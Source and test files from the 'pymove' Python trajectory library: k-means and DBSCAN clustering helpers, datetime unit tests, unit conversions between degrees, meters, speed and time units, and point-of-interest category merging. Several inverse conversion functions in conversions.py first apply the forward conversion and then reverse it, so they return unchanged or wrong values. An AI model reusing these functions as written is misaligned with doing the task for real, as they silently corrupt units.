km = KMeans(n_clusters=k, random_state=random_state)
inertia_dic[k] = km.fit(move_data[[LATITUDE, LONGITUDE]]).inertia_
return inertia_dic
@timer_decorator
def gap_statistic(
move_data: DataFrame,
nrefs: Optional[int] = 3,
k_initial: Optional[int] = 1,
max_clusters: Optional[int] = 15,
k_iteration: Optional[int] = 1,
random_state: Optional[int] = None
) -> Dict:
"""
Calculates optimal clusters numbers using Gap Statistic from Tibshirani,
<NAME>.
Parameters
----------
move_data: ndarray of shape (n_samples, n_features).
The input trajectory data.
nrefs: int, optional
number of sample reference datasets to create, by default 3
k_initial: int, optional.
The initial value used in the interaction of the elbow method, by default 1
Represents the maximum numbers of clusters.
max_clusters: int, optional
Maximum number of clusters to test for, by default 15
k_iteration:int, optional
Increment value of the sequence used by the elbow method, by default 1
random_state: int, RandomState instance
Determines random number generation for centroid initialization.
Use an int to make the randomness deterministic, by default None
Returns
-------
dict
The error value for each cluster number
Notes
-----
https://anaconda.org/milesgranger/gap-statistic/notebook
"""
message = 'Executing Gap Statistic to:\n...K of %srs to %srs from k_iteration:%srs\n'
message = message % (k_initial, max_clusters, k_iteration)
print(message, flush=True)
gaps = {}
np.random.seed(random_state)
for k in progress_bar(range(k_initial, max_clusters + 1, k_iteration)):
# Holder for reference dispersion results
ref_disps = np.zeros(nrefs)
# For n references, generate random sample and perform kmeans
# getting resulting dispersion of each loop
for i in range(nrefs):
# Create new random reference set
random_reference = np.random.random_sample(size=move_data.shape)
# Fit to it
km = KMeans(n_clusters=k, random_state=random_state)
ref_disps[i] = km.fit(random_reference).inertia_
# Fit cluster to original data and create dispersion
km = KMeans(k).fit(move_data[[LATITUDE, LONGITUDE]])
orig_disp = km.inertia_
# Calculate gap statistic
gap = np.log(np.mean(ref_disps)) - np.log(orig_disp)
# Assign this loop gap statistic to gaps
gaps[k] = gap
return gaps
@timer_decorator
def dbscan_clustering(
move_data: DataFrame,
cluster_by: Text,
meters: Optional[int] = 10,
min_sample: Optional[float] = 1680 / 2,
earth_radius: Optional[float] = EARTH_RADIUS,
metric: Optional[Union[Text, Callable]] = 'euclidean',
inplace: Optional[bool] = False
) -> Optional[DataFrame]:
"""
    Performs density-based clustering on the move_dataframe according to cluster_by.
Parameters
----------
move_data : dataframe
the input trajectory
cluster_by : str
        the column to cluster by
meters : int, optional
distance to use in the clustering, by default 10
min_sample : float, optional
the minimum number of samples to consider a cluster, by default 1680/2
    earth_radius : float, optional
        radius of the earth in the location, by default EARTH_RADIUS
metric: string, or callable, optional
The metric to use when calculating distance between instances in a feature array
by default 'euclidean'
inplace : bool, optional
        Whether the operation will be done in the original dataframe, by default False
Returns
-------
DataFrame
Clustered dataframe or None
"""
if not inplace:
move_data = move_data[:]
move_data.reset_index(drop=True, inplace=True)
move_data[N_CLUSTER] = -1
for cluster_id in progress_bar(move_data[cluster_by].unique(), desc='Clustering'):
df_filter = move_data[move_data[cluster_by] == cluster_id]
dbscan = DBSCAN(
eps=meters_to_eps(meters, earth_radius),
min_samples=min_sample,
metric=metric
)
dbscan_result = dbscan.fit(df_filter[[LATITUDE, LONGITUDE]].to_numpy())
idx = df_filter.index
res = dbscan_result.labels_ + move_data[N_CLUSTER].max() + 1
move_data.at[idx, N_CLUSTER] = res
if not inplace:
return move_data
```
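The functions above operate on plain dataframes that expose the `lat`/`lon` columns defined in `pymove.utils.constants`. Below is a minimal usage sketch, assuming the module is importable as `pymove.models.pattern_mining.clustering`; the sample coordinates and parameter values are made up for illustration.

```python
from pandas import DataFrame

# Hypothetical import path, based on the file location shown above.
from pymove.models.pattern_mining import clustering

# Toy trajectory points: two small spatial groups, tagged with an 'id' column.
df = DataFrame({
    'lat': [39.9841, 39.9842, 39.9843, 40.0100, 40.0101],
    'lon': [116.3192, 116.3193, 116.3194, 116.3300, 116.3301],
    'id': [1, 1, 1, 2, 2],
})

# Inertia for k = 1..3, useful for picking k visually (elbow method).
inertia = clustering.elbow_method(df, k_initial=1, max_clusters=3, k_iteration=1)

# Density-based clustering within each 'id' group, 50 m radius, 1 point minimum.
clustered = clustering.dbscan_clustering(
    df, cluster_by='id', meters=50, min_sample=1, inplace=False
)
```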
#### File: pymove/tests/test_utils_datetime.py
```python
import datetime as dt
from numpy import nan
from numpy.testing import assert_equal
from pandas import DataFrame, Timestamp
from pandas.testing import assert_frame_equal
from pymove import MoveDataFrame, datetime
from pymove.utils.constants import (
COUNT,
LOCAL_LABEL,
MAX,
MEAN,
MIN,
PREV_LOCAL,
STD,
SUM,
THRESHOLD,
TIME_TO_PREV,
)
default_date = dt.datetime.strptime('2018-03-12', '%Y-%m-%d')
default_date_time = dt.datetime.strptime('2018-03-12 12:08:07', '%Y-%m-%d %H:%M:%S')
str_date_default = '2018-03-12'
str_date_time_default = '2018-03-12 12:08:07'
list_data = [
[39.984094, 116.319236, '2008-10-23 05:44:05', 1],
[39.984198, 116.319322, '2008-10-23 05:56:06', 1],
[39.984224, 116.319402, '2008-10-23 05:56:11', 1],
[39.984224, 116.319402, '2008-10-23 06:10:15', 1],
]
def _default_move_df():
return MoveDataFrame(
data=list_data,
)
def test_date_to_str():
expected = '2008-10-23'
time_str = datetime.date_to_str(Timestamp('2008-10-23 05:53:05'))
assert(time_str == expected)
def test_str_to_datetime():
expected_date = default_date
expected_date_time = default_date_time
converted_date = datetime.str_to_datetime('2018-03-12')
assert(converted_date == expected_date)
converted_date_time = datetime.str_to_datetime('2018-03-12 12:08:07')
assert(converted_date_time == expected_date_time)
def test_to_str():
expected = str_date_time_default
data = default_date_time
str_date_time = datetime.to_str(data)
assert(str_date_time == expected)
def test_to_min():
expected = 25347608
data = default_date_time
date_to_min = datetime.to_min(data)
assert(date_to_min == expected)
def test_min_to_datetime():
expected = dt.datetime.strptime('2018-03-12 12:08:00',
'%Y-%m-%d %H:%M:%S')
data = 25347608
min_to_date = datetime.min_to_datetime(data)
assert(min_to_date == expected)
def test_to_day_of_week_int():
expected = 0
data = default_date
date_to_day_week = datetime.to_day_of_week_int(data)
assert(date_to_day_week == expected)
data = default_date_time
date_to_day_week = datetime.to_day_of_week_int(data)
assert(date_to_day_week == expected)
def test_working_day():
data = str_date_default
working_day = datetime.working_day(data)
assert(working_day is True)
data = default_date
working_day = datetime.working_day(data)
assert(working_day is True)
data = '2018-03-17'
working_day = datetime.working_day(data)
assert(working_day is False)
data = dt.datetime.strptime('2018-10-12', '%Y-%m-%d')
working_day = datetime.working_day(data, country='BR')
assert(working_day is False)
def test_now_str():
expected = datetime.to_str(dt.datetime.now())
time_now = datetime.now_str()
assert(time_now == expected)
def test_deltatime_str():
expected = '05.03s'
actual = datetime.deltatime_str(5.03)
assert expected == actual
expected = '18m:35.00s'
actual = datetime.deltatime_str(1115)
assert expected == actual
expected = '03h:05m:15.00s'
actual = datetime.deltatime_str(11115)
assert expected == actual
def test_timestamp_to_millis():
expected = 1520856487000
data = str_date_time_default
milliseconds = datetime.timestamp_to_millis(data)
assert(milliseconds == expected)
def test_millis_to_timestamp():
expected = default_date_time
data = 1520856487000
timestamp = datetime.millis_to_timestamp(data)
assert(timestamp == expected)
def test_time_to_str():
expected = '12:08:07'
data = default_date_time
time = datetime.time_to_str(data)
assert(time == expected)
def test_elapsed_time_dt():
data = default_date_time
expected = datetime.diff_time(default_date_time,
dt.datetime.now())
elapsed_time = datetime.elapsed_time_dt(data)
assert abs(elapsed_time - expected) <= 5
def test_diff_time():
expected = 388313000
start_date = default_date_time
end_date = dt.datetime.strptime('2018-03-17', '%Y-%m-%d')
diff_time = datetime.diff_time(start_date, end_date)
assert(diff_time == expected)
def test_create_time_slot_in_minute():
df = _default_move_df()
expected = DataFrame({
'lat': {0: 39.984094, 1: 39.984198, 2: 39.984224, 3: 39.984224},
'lon': {0: 116.319236, 1: 116.319322, 2: 116.319402, 3: 116.319402},
'datetime': {
0: Timestamp('2008-10-23 05:44:05'),
1: Timestamp('2008-10-23 05:56:06'),
2: Timestamp('2008-10-23 05:56:11'),
3: Timestamp('2008-10-23 06:10:15')
},
'id': {0: 1, 1: 1, 2: 1, 3: 1},
'time_slot': {0: 22, 1: 23, 2: 23, 3: 24}
})
datetime.create_time_slot_in_minute(df)
assert_frame_equal(df, expected)
def test_generate_time_statistics():
df_ = DataFrame(
data=[
[261, nan, nan],
[580, 261, 252],
[376, 580, 91],
[386, 376, 17449],
[644, 386, 21824]
],
columns=[LOCAL_LABEL, PREV_LOCAL, TIME_TO_PREV],
index=[0, 1, 2, 3, 4]
)
expected = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1]
],
columns=[LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT],
index=[0, 1, 2, 3]
)
df_statistics = datetime.generate_time_statistics(df_)
assert_frame_equal(df_statistics, expected)
def test_calc_time_threshold():
mean1, std1 = 0.0, 91.0
mean2, std2 = 0.0, 17449.0
mean3, std3 = 0.0, 252.0
mean4, std4 = 0.0, 21824.0
expected1 = 91.0
expected2 = 17449.0
expected3 = 252.0
expected4 = 21824.0
threshold1 = datetime._calc_time_threshold(mean1, std1)
threshold2 = datetime._calc_time_threshold(mean2, std2)
threshold3 = datetime._calc_time_threshold(mean3, std3)
threshold4 = datetime._calc_time_threshold(mean4, std4)
assert_equal(threshold1, expected1)
assert_equal(threshold2, expected2)
assert_equal(threshold3, expected3)
assert_equal(threshold4, expected4)
def test_threshold_time_statistics():
statistics = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1]
],
columns=[LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT],
index=[0, 1, 2, 3]
)
expected = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1, 91.0],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1, 17449.0],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1, 252.0],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1, 21824.0]
],
columns=[
LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT, THRESHOLD
],
index=[0, 1, 2, 3]
)
datetime.threshold_time_statistics(statistics)
assert_frame_equal(statistics, expected)
```
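These tests exercise `pymove.utils.datetime` through plain asserts, so under the usual project layout they can be collected and run with pytest. A small, hypothetical invocation sketch (assumes pytest is installed and the test module lives at the path shown above):

```python
# -q keeps the output short; the path is the test file documented in this section.
import pytest

pytest.main(['-q', 'pymove/tests/test_utils_datetime.py'])
```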
#### File: pymove/utils/conversions.py
```python
import math
from typing import TYPE_CHECKING, List, Optional, Text, Union
import numpy as np
from pandas import DataFrame
from shapely.geometry import Point
from pymove.utils.constants import (
DIST_TO_PREV,
EARTH_RADIUS,
GEOMETRY,
LATITUDE,
LONGITUDE,
SPEED_TO_PREV,
TIME_TO_PREV,
)
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def lat_meters(lat: float) -> float:
"""
Transform latitude degree to meters.
Parameters
----------
lat : float
This represent latitude value.
Returns
-------
float
Represents the corresponding latitude value in meters.
Examples
--------
Latitude in Fortaleza: -3.8162973555
>>> from pymove.utils.conversions import lat_meters
>>> lat_meters(-3.8162973555)
110826.6722516857
"""
rlat = float(lat) * math.pi / 180
# meter per degree Latitude
meters_lat = (
111132.92 - 559.82 * math.cos(2 * rlat) + 1.175 * math.cos(4 * rlat)
)
# meter per degree Longitude
meters_lgn = 111412.84 * math.cos(rlat) - 93.5 * math.cos(3 * rlat)
meters = (meters_lat + meters_lgn) / 2
return meters
def meters_to_eps(
radius_meters: float, earth_radius: Optional[float] = EARTH_RADIUS
) -> float:
"""
Converts radius in meters to eps
Parameters
----------
radius_meters : float
radius in meters
earth_radius : float, optional
radius of the earth in the location, by default EARTH_RADIUS
Returns
-------
float
radius in eps
"""
return radius_meters / earth_radius
def list_to_str(input_list: List, delimiter: Optional[Text] = ',') -> Text:
"""
Concatenates list elements, joining them by the separator specified by the
parameter "delimiter".
Parameters
----------
input_list : list
List with elements to be joined.
delimiter : str, optional
The separator used between elements, by default ','.
Returns
-------
str
Returns a string, resulting from concatenation of list elements,
        separated by the delimiter.
"""
return delimiter.join(
[x if isinstance(x, str) else repr(x) for x in input_list]
)
def list_to_csv_str(input_list: List) -> Text:
"""
Concatenates the elements of the list, joining them by ",".
Parameters
----------
input_list : list
List with elements to be joined.
Returns
-------
str
Returns a string, resulting from concatenation of list elements,
        separated by ",".
Example
-------
>>> from pymove import conversions
>>> a = [1, 2, 3, 4, 5]
>>> conversions.list_to_csv_str(a)
    '1,2,3,4,5'
"""
return list_to_str(input_list)
def list_to_svm_line(original_list: List) -> Text:
"""
Concatenates list elements in consecutive element pairs.
Parameters
----------
original_list : list
The elements to be joined
Returns
-------
str
Returns a string, resulting from concatenation of list elements
        in consecutive element pairs, separated by " ".
Example
-------
>>> from pymove import conversions
>>> a = [1, 2, 3, 4, 5]
>>> conversions.list_to_svm_line(a)
'1 1:2 2:3 3:4 4:5'
"""
list_size = len(original_list)
svm_line = '%s ' % original_list[0]
for i in range(1, list_size):
svm_line += '%s:%s ' % (i, original_list[i])
return svm_line.rstrip()
def lon_to_x_spherical(lon: float) -> float:
"""
Convert longitude to X EPSG:3857 WGS 84/Pseudo-Mercator.
Parameters
----------
lon : float
Represents longitude.
Returns
-------
float
X offset from your original position in meters.
Examples
--------
>>> from pymove import conversions
>>> conversions.lon_to_x_spherical(-38.501597 )
-4285978.17
References
----------
https://epsg.io/transform
"""
return 6378137 * np.radians(lon)
def lat_to_y_spherical(lat: float) -> float:
"""
Convert latitude to Y EPSG:3857 WGS 84/Pseudo-Mercator.
Parameters
----------
lat : float
Represents latitude.
Returns
-------
float
Y offset from your original position in meters.
Examples
--------
>>> from pymove import conversions
>>> conversions.lat_to_y_spherical(-3.797864)
-423086.2213610324
References
----------
https://epsg.io/transform
"""
return 6378137 * np.log(np.tan(np.pi / 4 + np.radians(lat) / 2.0))
def x_to_lon_spherical(x: float) -> float:
"""
Convert X EPSG:3857 WGS 84 / Pseudo-Mercator to longitude.
Parameters
----------
x : float
X offset from your original position in meters.
Returns
-------
float
Represents longitude.
Examples
--------
>>> from pymove import conversions
>>> conversions.x_to_lon_spherical(-4285978.17)
-38.501597
References
----------
https://epsg.io/transform
"""
return np.degrees(x / 6378137.0)
def y_to_lat_spherical(y: float) -> float:
"""
Convert Y EPSG:3857 WGS 84 / Pseudo-Mercator to latitude.
Parameters
----------
y : float
Y offset from your original position in meters.
Returns
-------
float
Represents latitude.
Examples
--------
>>> from pymove import conversions
    >>> conversions.y_to_lat_spherical(-423086.22)
-3.797864
References
----------
https://epsg.io/transform
"""
return np.degrees(np.arctan(np.sinh(y / 6378137.0)))
def geometry_points_to_lat_and_lon(
move_data: DataFrame,
geometry_label: Optional[Text] = GEOMETRY,
drop_geometry: Optional[bool] = True,
inplace: Optional[bool] = True
) -> DataFrame:
"""
Converts the geometry column to latitude and longitude
columns (named 'lat' and 'lon'), removing geometries
that are not of the Point type.
Parameters
----------
move_data : DataFrame
Input trajectory data.
    geometry_label: str, optional
Represents column name of the geometry column, by default GEOMETRY
drop_geometry: bool, optional
Option to drop the geometry column, by default True
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
move_data = move_data[
move_data[geometry_label].map(type) == Point
]
move_data[LONGITUDE] = move_data[geometry_label].map(lambda p: p.x)
move_data[LATITUDE] = move_data[geometry_label].map(lambda q: q.y)
if drop_geometry:
move_data.drop(geometry_label, axis=1, inplace=True)
if not inplace:
return move_data
def lat_and_lon_decimal_degrees_to_decimal(
move_data: DataFrame,
latitude: Optional[Text] = LATITUDE,
longitude: Optional[Text] = LONGITUDE
) -> DataFrame:
"""
    Converts latitude and longitude values from strings suffixed with a
    hemisphere letter ('N'/'S', 'E'/'W') to signed decimal degrees.
Parameters
----------
move_data : DataFrame
Input trajectory data.
latitude: str, optional
Represents column name of the latitude column, by default LATITUDE
longitude: str, optional
Represents column name of the longitude column, by default LONGITUDE
Returns
-------
DataFrame
A new dataframe with the converted feature
"""
def _decimal_degree_to_decimal(row):
if (row[latitude][-1:] == 'N'):
row[latitude] = float(row[latitude][:-1])
else:
row[latitude] = float(row[latitude][:-1]) * -1
if (row[longitude][-1:] == 'E'):
row[longitude] = float(row[longitude][:-1])
else:
row[longitude] = float(row[longitude][:-1]) * -1
return row
return move_data.apply(_decimal_degree_to_decimal, axis=1)
def ms_to_kmh(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_speed: Optional[Text] = SPEED_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in ms, in label_speed column to kmh.
Parameters
----------
move_data : DataFrame
Input trajectory data.
label_speed : str, optional
Represents column name of speed, by default SPEED_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_speed not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_speed] = move_data[label_speed].apply(
lambda row: row * 3.6
)
if new_label is not None:
move_data.rename(columns={label_speed: new_label}, inplace=True)
if not inplace:
return move_data
def kmh_to_ms(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_speed: Optional[Text] = SPEED_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in kmh, in label_speed column to ms.
Parameters
----------
    move_data : DataFrame
Input trajectory data.
label_speed : str, optional
Represents column name of speed, by default SPEED_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_speed not in move_data:
move_data.generate_dist_time_speed_features()
ms_to_kmh(move_data, label_speed)
move_data[label_speed] = move_data[label_speed].apply(
lambda row: row / 3.6
)
if new_label is not None:
move_data.rename(columns={label_speed: new_label}, inplace=True)
if not inplace:
return move_data
def meters_to_kilometers(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_distance: Optional[Text] = DIST_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in meters, in label_distance column to kilometers.
Parameters
----------
    move_data : DataFrame
        Input trajectory data.
    label_distance : str, optional
        Represents column name of distance, by default DIST_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_distance not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_distance] = move_data[label_distance].apply(
lambda row: row / 1000
)
if new_label is not None:
move_data.rename(columns={label_distance: new_label}, inplace=True)
if not inplace:
return move_data
def kilometers_to_meters(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_distance: Optional[Text] = DIST_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in kilometers, in label_distance column to meters.
Parameters
----------
    move_data : DataFrame
        Input trajectory data.
    label_distance : str, optional
        Represents column name of distance, by default DIST_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_distance not in move_data:
move_data.generate_dist_time_speed_features()
meters_to_kilometers(move_data, label_distance)
move_data[label_distance] = move_data[label_distance].apply(
lambda row: row * 1000
)
if new_label is not None:
move_data.rename(columns={label_distance: new_label}, inplace=True)
if not inplace:
return move_data
def seconds_to_minutes(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in seconds, in label_time column to minutes.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def minute_to_seconds(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in minutes, in label_time column to seconds.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_minutes(move_data, label_time)
    move_data[label_time] = move_data[label_time].apply(
lambda row: row * 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def minute_to_hours(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in minutes, in label_time column to hours.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_minutes(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def hours_to_minute(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in hours, in label_time column to minutes.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_hours(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row * 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def seconds_to_hours(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in seconds, in label_time column to hours.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 3600.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def hours_to_seconds(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
    inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
    Convert values, in hours, in label_time column to seconds.
    Parameters
    ----------
    move_data : DataFrame
        Input trajectory data.
    label_time : str, optional
        Represents column name of time, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_hours(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row * 3600.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
```
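Most helpers in this module are small pure functions, so they can be sanity-checked directly from an interpreter. A short sketch using the same import style as the docstring examples (output values are approximate and for illustration only):

```python
from pymove import conversions

# Meters per degree of latitude near Fortaleza (approx. 110826.67).
meters = conversions.lat_meters(-3.8162973555)

# Round trip between longitude and EPSG:3857 X (approx. -4285978.17 and back).
x = conversions.lon_to_x_spherical(-38.501597)
lon = conversions.x_to_lon_spherical(x)

# List formatting helpers.
csv_line = conversions.list_to_csv_str([1, 2, 3, 4, 5])   # '1,2,3,4,5'
svm_line = conversions.list_to_svm_line([1, 2, 3, 4, 5])  # '1 1:2 2:3 3:4 4:5'
```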
#### File: pymove/utils/integration.py
```python
from typing import List, Optional, Text, Tuple
import numpy as np
from numpy import ndarray
from pandas import DataFrame, Timedelta
from pandas.core.series import Series
from pymove.preprocessing import filters
from pymove.utils.constants import (
ADDRESS,
CITY,
DATETIME,
DIST_EVENT,
DIST_HOME,
DIST_POI,
EVENT_ID,
EVENT_TYPE,
GEOMETRY,
HOME,
ID_POI,
LATITUDE,
LONGITUDE,
NAME_POI,
TRAJ_ID,
TYPE_POI,
VIOLATING,
)
from pymove.utils.distances import haversine
from pymove.utils.log import progress_bar
def union_poi_bank(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between the different bank categories
for Points of Interest in a single category named 'banks'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union bank categories to one category')
print('... There are {} -- {}'.format(data[label_poi].nunique(), label_poi))
banks = [
'bancos_filiais',
'bancos_agencias',
'bancos_postos',
'bancos_PAE',
'bank',
]
filter_bank = data[label_poi].isin(banks)
data.at[data[filter_bank].index, label_poi] = 'banks'
def union_poi_bus_station(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between the different bus station categories
for Points of Interest in a single category named 'bus_station'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union bus station categories to one category')
filter_bus_station = data[label_poi].isin(
['transit_station', 'pontos_de_onibus']
)
data.at[data[filter_bus_station].index, label_poi] = 'bus_station'
def union_poi_bar_restaurant(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between bar and restaurant categories
for Points of Interest in a single category named 'bar-restaurant'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union restaurant and bar categories to one category')
filter_bar_restaurant = data[label_poi].isin(['restaurant', 'bar'])
data.at[data[filter_bar_restaurant].index, label_poi] = 'bar-restaurant'
def union_poi_parks(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between park categories
for Points of Interest in a single category named 'parks'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union parks categories to one category')
filter_parks = data[label_poi].isin(['pracas_e_parques', 'park'])
data.at[data[filter_parks].index, label_poi] = 'parks'
def union_poi_police(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between police categories
for Points of Interest in a single category named 'police'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union distritos policies and police categories')
filter_police = data[label_poi] == 'distritos_policiais'
data.at[data[filter_police].index, label_poi] = 'police'
def join_collective_areas(
